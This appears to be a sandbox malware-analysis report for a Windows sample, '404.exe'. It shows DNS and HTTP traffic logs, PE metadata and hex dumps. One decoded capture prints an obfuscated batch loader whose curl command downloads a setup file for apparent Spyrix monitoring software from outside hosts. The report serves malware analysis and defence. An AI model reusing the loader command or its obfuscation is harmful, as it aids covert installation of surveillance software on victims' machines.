.reloc	0x1a000	0xc	0x200	4841e7189fe8b30a7d5810f49c13b925	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x18100	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.34131205673758863
RT_GROUP_ICON	0x18578	0x14	data	1.1
RT_VERSION	0x1859c	0x304	data	0.4339378238341969
RT_MANIFEST	0x188b0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 06:25:24.962116003 CEST	192.168.2.7	1.1.1.1	0x44e5	Standard query (0)	filedn.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:25:37.741622925 CEST	192.168.2.7	1.1.1.1	0x51f7	Standard query (0)	cdnbaynet.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:25:39.386451006 CEST	192.168.2.7	1.1.1.1	0x21eb	Standard query (0)	swtb-download.spyrix-sfk.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:21.470566988 CEST	192.168.2.7	1.1.1.1	0xd3e	Standard query (0)	dashboard.spyrix.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:21.470732927 CEST	192.168.2.7	1.1.1.1	0xb576	Standard query (0)	dashboard.spyrix.com	65	IN (0x0001)	false
Oct 2, 2024 06:28:21.927078009 CEST	192.168.2.7	1.1.1.1	0x49ff	Standard query (0)	spyrix.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:22.450556040 CEST	192.168.2.7	1.1.1.1	0x9acd	Standard query (0)	cdn.cdndownload.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:22.450834036 CEST	192.168.2.7	1.1.1.1	0x80cb	Standard query (0)	cdn.cdndownload.net	65	IN (0x0001)	false
Oct 2, 2024 06:28:24.451543093 CEST	192.168.2.7	1.1.1.1	0x4709	Standard query (0)	cdn.cdndownload.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:24.451688051 CEST	192.168.2.7	1.1.1.1	0x8a40	Standard query (0)	cdn.cdndownload.net	65	IN (0x0001)	false
Oct 2, 2024 06:28:25.638103962 CEST	192.168.2.7	1.1.1.1	0x845e	Standard query (0)	dashboard.spyrix.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:25.638254881 CEST	192.168.2.7	1.1.1.1	0x7bc4	Standard query (0)	dashboard.spyrix.com	65	IN (0x0001)	false
Oct 2, 2024 06:28:25.714787960 CEST	192.168.2.7	1.1.1.1	0xbc5c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:25.715009928 CEST	192.168.2.7	1.1.1.1	0x875b	Standard query (0)	www.google.com	65	IN (0x0001)	false
Oct 2, 2024 06:28:38.227751017 CEST	192.168.2.7	1.1.1.1	0x14b6	Standard query (0)	spyrix.net	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 06:25:24.978707075 CEST	1.1.1.1	192.168.2.7	0x44e5	No error (0)	filedn.com		23.109.93.100	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:25:37.760557890 CEST	1.1.1.1	192.168.2.7	0x51f7	No error (0)	cdnbaynet.com		167.114.14.170	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:25:39.397809982 CEST	1.1.1.1	192.168.2.7	0x21eb	No error (0)	swtb-download.spyrix-sfk.com		167.114.14.168	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:21.490582943 CEST	1.1.1.1	192.168.2.7	0xd3e	No error (0)	dashboard.spyrix.com		158.69.117.119	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:21.938788891 CEST	1.1.1.1	192.168.2.7	0x49ff	No error (0)	spyrix.net		158.69.117.119	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:22.499238968 CEST	1.1.1.1	192.168.2.7	0x9acd	No error (0)	cdn.cdndownload.net	cl-e0469d03.edgecdn.ru		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:28:22.499238968 CEST	1.1.1.1	192.168.2.7	0x9acd	No error (0)	cl-e0469d03.edgecdn.ru		95.181.182.182	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:22.525718927 CEST	1.1.1.1	192.168.2.7	0x80cb	No error (0)	cdn.cdndownload.net	cl-e0469d03.edgecdn.ru		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:28:24.500161886 CEST	1.1.1.1	192.168.2.7	0x8a40	No error (0)	cdn.cdndownload.net	cl-e0469d03.edgecdn.ru		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:28:24.507843018 CEST	1.1.1.1	192.168.2.7	0x4709	No error (0)	cdn.cdndownload.net	cl-e0469d03.edgecdn.ru		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:28:24.507843018 CEST	1.1.1.1	192.168.2.7	0x4709	No error (0)	cl-e0469d03.edgecdn.ru		95.181.182.182	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:25.645994902 CEST	1.1.1.1	192.168.2.7	0x845e	No error (0)	dashboard.spyrix.com		158.69.117.119	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:25.721520901 CEST	1.1.1.1	192.168.2.7	0x875b	No error (0)	www.google.com			65	IN (0x0001)	false
Oct 2, 2024 06:28:25.721626043 CEST	1.1.1.1	192.168.2.7	0xbc5c	No error (0)	www.google.com		142.250.184.228	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:28:38.239337921 CEST	1.1.1.1	192.168.2.7	0x14b6	No error (0)	spyrix.net		158.69.117.119	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:26 UTC	111	OUT	GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s148 HTTP/1.1 Host: filedn.com Connection: Keep-Alive
2024-10-02 04:25:26 UTC	393	IN	HTTP/1.1 200 OK Server: CacheHTTPd v1.0 Date: Wed, 02 Oct 2024 04:25:26 +0000 Content-Type: application/octet-stream Content-Length: 13827 Etag: "96f78fbb8f479e7d1c2a71a1226c1bc0507ca865" Expires: Wed, 02 Oct 2024 10:25:26 +0000 Content-Disposition: attachment; filename="s148" Accept-Ranges: bytes Content-Transfer-Encoding: binary Connection: keep-alive Keep-Alive: timeout=30
2024-10-02 04:25:26 UTC	4096	IN	Data Raw: 72 65 6d 20 6f 69 68 75 6c 32 65 68 6f 6d 79 31 72 64 38 76 72 69 31 32 65 6b 6a 71 70 6f 62 38 65 63 6d 32 71 38 7a 35 6c 78 73 66 39 73 74 64 68 71 6b 68 34 72 77 36 73 36 75 6b 68 70 72 72 31 79 30 30 61 69 33 72 39 65 65 64 35 36 35 31 76 6a 67 38 78 69 67 71 30 79 30 34 77 77 69 75 32 64 78 7a 65 66 69 73 6d 67 35 70 30 33 32 6d 66 72 72 38 64 0d 0a 72 65 6d 20 74 64 73 63 7a 63 72 32 6c 39 34 68 68 30 6d 62 7a 36 79 64 6f 31 71 6a 70 6b 65 32 71 6e 6e 36 6c 70 61 71 74 71 71 73 63 6e 6b 79 69 30 34 73 76 62 39 30 6d 38 6d 62 62 30 32 38 72 7a 78 6d 6b 37 66 61 62 69 6c 6d 39 30 37 71 38 6a 64 77 67 69 71 36 73 36 61 75 78 6c 77 75 74 72 33 61 72 72 37 31 6e 61 6a 65 74 0d 0a 40 65 63 68 6f 20 6f 66 66 0d 0a 72 65 6d 20 78 65 71 74 78 30 30 65 68 38 Data Ascii: rem oihul2ehomy1rd8vri12ekjqpob8ecm2q8z5lxsf9stdhqkh4rw6s6ukhprr1y00ai3r9eed5651vjg8xigq0y04wwiu2dxzefismg5p032mfrr8drem tdsczcr2l94hh0mbz6ydo1qjpke2qnn6lpaqtqqscnkyi04svb90m8mbb028rzxmk7fabilm907q8jdwgiq6s6auxlwutr3arr71najet@echo offrem xeqtx00eh8
2024-10-02 04:25:26 UTC	4096	IN	Data Raw: 6d 61 32 6e 6e 72 36 30 65 76 76 35 31 34 64 75 72 34 6f 73 7a 79 73 74 70 76 61 68 61 64 35 78 66 64 6e 6c 34 6b 76 6e 35 30 64 78 77 69 63 66 7a 30 64 78 68 6d 65 65 6a 69 74 74 74 6e 30 30 64 0d 0a 63 75 72 6c 2e 65 78 65 20 2d 2d 69 6e 73 65 63 75 72 65 20 2d 2d 75 73 65 72 2d 61 67 65 6e 74 20 22 73 66 6b 2d 64 73 74 2d 6c 6f 61 64 65 72 2d 32 2e 30 22 20 2d 6f 20 22 25 54 45 4d 50 25 5c 25 66 68 6a 70 30 66 25 5c 6c 22 20 68 74 74 70 73 3a 2f 2f 63 64 6e 62 61 79 6e 65 74 2e 63 6f 6d 2f 6c 6f 61 64 65 72 2f 6c 69 6e 6b 2e 70 68 70 3f 70 72 67 5f 69 64 3d 73 66 6b 0d 0a 72 65 6d 20 62 63 6f 7a 61 7a 38 62 39 38 67 6e 75 31 35 74 65 6a 65 6c 72 63 72 79 39 6e 36 65 77 37 72 38 38 34 74 76 74 75 6a 31 74 64 69 68 77 35 73 34 39 34 63 39 31 30 7a 32 0d Data Ascii: ma2nnr60evv514dur4oszystpvahad5xfdnl4kvn50dxwicfz0dxhmeejitttn00dcurl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "%TEMP%\%fhjp0f%\l" https://cdnbaynet.com/loader/link.php?prg_id=sfkrem bcozaz8b98gnu15tejelrcry9n6ew7r884tvtuj1tdihw5s494c910z2
2024-10-02 04:25:26 UTC	4096	IN	Data Raw: 25 66 68 6a 70 30 66 25 5c 25 66 6e 6f 6a 72 6f 74 71 73 61 6b 68 63 35 74 70 39 66 25 22 20 25 6c 6e 6b 25 0d 0a 72 65 6d 20 70 68 30 33 30 62 63 32 7a 6a 6e 63 68 77 38 75 6c 61 7a 69 6b 37 6b 6a 72 74 75 77 71 67 74 36 79 31 30 65 6b 34 64 78 36 39 71 67 30 68 79 34 76 63 35 33 6d 30 6a 31 30 79 73 68 65 6e 78 6c 69 0d 0a 72 65 6d 20 30 65 66 62 66 7a 69 75 79 63 71 33 63 74 66 32 70 6d 78 37 38 78 36 79 73 30 77 62 77 34 74 38 64 72 6f 70 6f 31 76 34 38 6f 34 72 72 30 70 30 71 6d 0d 0a 72 65 6d 20 70 31 38 62 31 31 62 73 6f 6a 39 65 35 77 70 74 31 61 6f 63 30 36 65 79 34 36 74 66 39 79 36 64 36 6b 69 78 38 36 6b 73 39 6f 64 71 6c 7a 7a 79 76 69 76 61 73 76 6b 64 35 73 6c 72 63 73 30 70 6a 67 6d 6f 74 74 78 30 38 63 76 71 77 78 63 69 73 63 65 7a 68 65 Data Ascii: %fhjp0f%\%fnojrotqsakhc5tp9f%" %lnk%rem ph030bc2zjnchw8ulazik7kjrtuwqgt6y10ek4dx69qg0hy4vc53m0j10yshenxlirem 0efbfziuycq3ctf2pmx78x6ys0wbw4t8dropo1v48o4rr0p0qmrem p18b11bsoj9e5wpt1aoc06ey46tf9y6d6kix86ks9odqlzzyvivasvkd5slrcs0pjgmottx08cvqwxciscezhe
2024-10-02 04:25:26 UTC	1539	IN	Data Raw: 72 65 6d 20 75 36 76 6c 33 61 6e 30 34 6e 30 6b 6b 30 63 71 76 75 78 74 79 77 31 76 62 63 36 76 30 31 79 35 39 38 6e 77 72 34 64 62 75 30 66 30 6e 6d 38 68 7a 68 70 79 6d 73 71 6a 30 64 74 38 38 38 62 36 66 6c 39 36 36 6d 64 32 63 6b 72 73 39 33 37 63 72 61 6f 6a 33 63 0d 0a 29 0d 0a 72 65 6d 20 6e 71 72 66 67 34 6b 68 69 70 38 32 6c 70 66 79 6c 65 61 66 72 6d 63 34 6e 77 67 78 73 61 61 7a 30 75 78 62 32 6a 65 67 77 30 7a 75 68 69 30 6c 63 6b 6b 61 62 38 6d 72 6f 6d 78 72 33 30 64 69 33 67 30 36 6a 72 72 68 71 38 63 74 76 31 63 74 62 39 6c 68 6d 71 73 6c 34 6f 6a 6a 30 34 65 33 77 39 35 72 37 77 68 6f 31 68 66 30 68 0d 0a 72 65 6d 20 6c 6d 30 6a 65 6a 76 73 34 65 30 78 70 30 66 6f 34 6d 77 69 36 75 30 73 6f 7a 76 61 64 64 62 71 64 65 32 73 78 70 37 33 7a Data Ascii: rem u6vl3an04n0kk0cqvuxtyw1vbc6v01y598nwr4dbu0f0nm8hzhpymsqj0dt888b6fl966md2ckrs937craoj3c)rem nqrfg4khip82lpfyleafrmc4nwgxsaaz0uxb2jegw0zuhi0lckkab8mromxr30di3g06jrrhq8ctv1ctb9lhmqsl4ojj04e3w95r7who1hf0hrem lm0jejvs4e0xp0fo4mwi6u0sozvaddbqde2sxp73z

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 404.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\cfg.cmd (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.url (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.ico (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.png (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.ico (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.png (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.ico (copy)

Windows Analysis Report
404.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:30 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-10-02 04:25:30 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=130820 Date: Wed, 02 Oct 2024 04:25:30 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:31 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-10-02 04:25:31 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=130763 Date: Wed, 02 Oct 2024 04:25:31 GMT Content-Length: 55 Connection: close X-CID: 2
2024-10-02 04:25:31 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:38 UTC	110	OUT	GET /loader/link.php?prg_id=sfk HTTP/1.1 Host: cdnbaynet.com User-Agent: sfk-dst-loader-2.0 Accept: /
2024-10-02 04:25:39 UTC	165	IN	HTTP/1.1 200 OK Server: nginx/1.17.3 Date: Wed, 02 Oct 2024 04:25:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 04:25:39 UTC	74	IN	Data Raw: 33 66 0d 0a 68 74 74 70 73 3a 2f 2f 73 77 74 62 2d 64 6f 77 6e 6c 6f 61 64 2e 73 70 79 72 69 78 2d 73 66 6b 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 73 66 6b 2f 73 66 6b 5f 73 65 74 75 70 2e 65 78 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 3fhttps://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe0

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:39 UTC	125	OUT	GET /download/sfk/sfk_setup.exe HTTP/1.1 Host: swtb-download.spyrix-sfk.com User-Agent: sfk-dst-loader-2.0 Accept: /
2024-10-02 04:25:40 UTC	380	IN	HTTP/1.1 200 OK Server: nginx/1.17.3 Date: Wed, 02 Oct 2024 04:25:40 GMT Content-Type: application/octet-stream Content-Length: 33441448 Connection: close Last-Modified: Wed, 02 Oct 2024 04:09:15 GMT Content-Disposition: attachment; filename="sfk_setup.exe" ETag: "66fcc76b-1fe46a8" Strict-Transport-Security: max-age=31536000; includeSubDomains Accept-Ranges: bytes
2024-10-02 04:25:40 UTC	16004	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-10-02 04:25:40 UTC	16384	IN	Data Raw: 08 c7 ff ff c3 8d 40 00 8b 10 85 d2 74 0e c7 00 00 00 00 00 50 52 e8 f1 c6 ff ff 58 c3 8d 40 00 53 56 89 c3 89 d6 8b 03 85 c0 74 0c c7 03 00 00 00 00 50 e8 d4 c6 ff ff 83 c3 04 4e 75 e8 5e 5b c3 8d 40 00 39 10 74 23 85 d2 0f 84 b8 ff ff ff 8b 4a fc d1 e9 0f 84 ad ff ff ff 51 52 50 e8 a1 c6 ff ff 85 c0 0f 84 6d ff ff ff c3 55 8b ec 81 c4 04 f0 ff ff 50 83 c4 fc 53 56 57 8b f1 89 55 fc 8b f8 85 f6 7f 09 8b c7 e8 7a ff ff ff eb 6c 8d 46 01 3d ff 07 00 00 7d 2f 56 8b 45 08 50 8d 85 fc ef ff ff 8b 4d fc ba ff 07 00 00 e8 b6 fc ff ff 8b d8 85 db 7e 11 8d 95 fc ef ff ff 8b c7 8b cb e8 51 00 00 00 eb 33 8d 5e 01 8b c7 8b d3 e8 d3 00 00 00 56 8b 45 08 50 8b 07 e8 b7 00 00 00 8b 4d fc 8b d3 e8 7d fc ff ff 8b d8 85 db 7d 02 33 db 8b c7 8b d3 e8 ac 00 00 00 5f 5e 5b Data Ascii: @tPRX@SVtPNu^[@9t#JQRPmUPSVWUzlF=}/VEPM~Q3^VEPM}}3_^[
2024-10-02 04:25:40 UTC	16384	IN	Data Raw: 4e 32 e4 c3 80 7d dc 00 74 06 66 b8 2d 00 66 ab c3 e8 ee ff ff ff 0f bf 4d da 31 d2 3b 4d 0c 7f 25 83 f9 fd 7c 20 09 c9 7f 22 66 b8 30 00 66 ab 80 3e 00 74 4b 66 8b 45 f6 66 ab f7 d9 66 b8 30 00 f3 66 ab eb 20 b9 01 00 00 00 42 ac 08 c0 74 20 32 e4 66 ab e2 f5 ac 08 c0 74 1c 32 e4 c1 e0 10 66 8b 45 f6 ab ac 08 c0 74 0d 32 e4 66 ab eb f5 66 b8 30 00 f3 66 ab 09 d2 74 04 31 c0 eb 22 c3 e8 7e ff ff ff e8 6e ff ff ff 66 ab 66 8b 45 f6 66 ab 8b 4d 0c 49 e8 5d ff ff ff 66 ab e2 f7 b4 2b 8b 4d 08 83 f9 04 76 02 31 c9 b0 45 8a 5d dd b7 01 0f bf 55 da 4a e8 e3 fd ff ff c3 e8 41 ff ff ff 8b 55 08 83 fa 12 72 05 ba 12 00 00 00 0f bf 4d da 09 c9 7f 08 66 b8 30 00 66 ab eb 2e 31 db 80 7d 10 02 74 0a 89 c8 48 b3 03 f6 f3 88 e3 43 e8 02 ff ff ff 66 ab 49 74 12 4b 75 f3 Data Ascii: N2}tf-fM1;M%\| "f0f>tKfEff0f Bt 2ft2fEt2ff0ft1"~nffEfMI]f+Mv1E]UJAUrMf0f.1}tHCfItKu
2024-10-02 04:25:40 UTC	16384	IN	Data Raw: e8 ff 74 ff ff 5a 5e 5b c3 00 00 00 b0 04 02 00 ff ff ff ff 1d 00 00 00 43 00 6f 00 6d 00 70 00 72 00 65 00 73 00 73 00 65 00 64 00 20 00 62 00 6c 00 6f 00 63 00 6b 00 20 00 69 00 73 00 20 00 63 00 6f 00 72 00 72 00 75 00 70 00 74 00 65 00 64 00 00 00 53 56 57 55 51 8b f9 8b f0 33 c0 89 04 24 8b ea 85 ff 7e 3e 83 7e 18 00 75 0d 83 7e 0c 00 74 32 8b c6 e8 09 ff ff ff 8b df 3b 5e 18 76 03 8b 5e 18 8b d5 8b 46 14 8d 44 06 1c 8b cb e8 a3 64 ff ff 01 5e 14 29 5e 18 03 eb 2b fb 01 1c 24 85 ff 7f c2 8b 04 24 5a 5d 5f 5e 5b c3 90 53 56 57 8b f1 8b fa 8b d8 8b 43 04 85 c0 74 0b 8b d7 8b ce 8b 18 ff 53 04 eb 25 8b d7 8b ce 8b c3 e8 7e ff ff ff 3b f0 74 16 b9 84 cb 40 00 b2 01 a1 dc c4 40 00 e8 b5 cc ff ff e8 14 74 ff ff 5f 5e 5b c3 b0 04 02 00 ff ff ff ff 1d 00 00 Data Ascii: tZ^[Compressed block is corruptedSVWUQ3$~>~u~t2;^v^FDd^)^+$$Z]_^[SVWCtS%~;t@@t_^[
2024-10-02 04:25:40 UTC	16384	IN	Data Raw: 41 00 68 7c 17 41 00 68 60 17 41 00 e8 83 50 ff ff 50 e8 8d 50 ff ff a3 20 85 41 00 83 3d 1c 85 41 00 00 74 09 83 3d 20 85 41 00 00 75 04 33 c0 eb 02 b0 01 a2 24 85 41 00 8d 45 f8 e8 0b a3 ff ff 8b 45 f8 8d 55 fc e8 10 9c ff ff 8d 45 fc ba c4 17 41 00 e8 bb 38 ff ff 8b 45 fc ba 00 80 00 00 e8 9a 95 ff ff 8d 55 f4 b8 fb 3a 78 4c e8 8d a8 ff ff 33 c0 5a 59 59 64 89 10 68 19 17 41 00 8d 45 f4 ba 03 00 00 00 e8 7f 35 ff ff c3 e9 91 27 ff ff eb eb 8b e5 5d c3 00 00 00 57 00 6f 00 77 00 36 00 34 00 44 00 69 00 73 00 61 00 62 00 6c 00 65 00 57 00 6f 00 77 00 36 00 34 00 46 00 73 00 52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 69 00 6f 00 6e 00 00 00 00 00 6b 00 65 00 72 00 6e 00 65 00 6c 00 33 00 32 00 2e 00 64 00 6c 00 6c 00 00 00 00 00 57 00 6f 00 77 00 36 Data Ascii: Ah\|Ah`APPP A=At= Au3$AEEUEA8EU:xL3ZYYdhAE5']Wow64DisableWow64FsRedirectionkernel32.dllWow6
2024-10-02 04:25:40 UTC	16384	IN	Data Raw: 02 8d 22 b0 e3 2d 73 64 d6 ee 50 f8 ed b3 02 09 8b 0b af 10 c8 a4 fd 03 4b c6 c9 a5 ae db ef 8d 00 26 ce 56 c3 48 d1 4b 10 36 17 48 24 8c 19 42 38 8b 07 03 23 89 29 92 9a fe 8a c2 a2 0d 76 af 3f 91 da d8 6e bd ec 34 75 aa 50 ae cf 81 37 02 98 34 8d 1a a9 2c b5 5a 0b c0 5a 3d 80 a1 59 1e 61 ea c5 40 4e 26 77 05 a2 86 99 52 fd db 67 09 8a 2c bf 00 88 ee 2c 2e 94 ff e5 ba fd 06 6f 04 60 18 3f 2b f1 07 01 79 ad ed 38 c2 be d7 1d f3 9f 98 15 99 8b 5f 27 bc bd de f6 46 31 1a 89 2f 97 8e 95 f3 5d 9f 03 83 67 02 a8 1a 2c 90 b1 d0 76 58 4d 1b 29 fc ea 62 c9 63 01 11 62 c3 27 84 db 9e b6 b7 98 ca bf 21 da a0 12 38 a5 74 82 dc ef fa 1c 18 bc 12 c0 d8 99 94 93 09 b5 4c 77 03 ba da 8e 65 64 2f c2 65 83 b9 1b 10 05 cc 94 e9 ff 7e 5e e1 c3 8f ed 67 7d ba c3 f1 60 c9 b8 Data Ascii: "-sdPK&VHK6H$B8#)v?n4uP74,ZZ=Ya@N&wRg,,.o`?+y8_'F1/]g,vXM)bcb'!8tLwed/e~^g}`
2024-10-02 04:25:40 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe a4 62 1f fd 9e 64 dc ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd b0 80 ff fd e7 d8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ed e3 ff fd b6 8a ff ff a0 64 ff ff a0 64 Data Ascii: bddddddddddddddddddddddddd
2024-10-02 04:25:40 UTC	16384	IN	Data Raw: ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd cc ad ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fb f9 ff fd d6 bd ff fe af 7e ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd c2 9d ff ff fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: ddddddddddddd~ddddddddddddddddddddddddddddddd
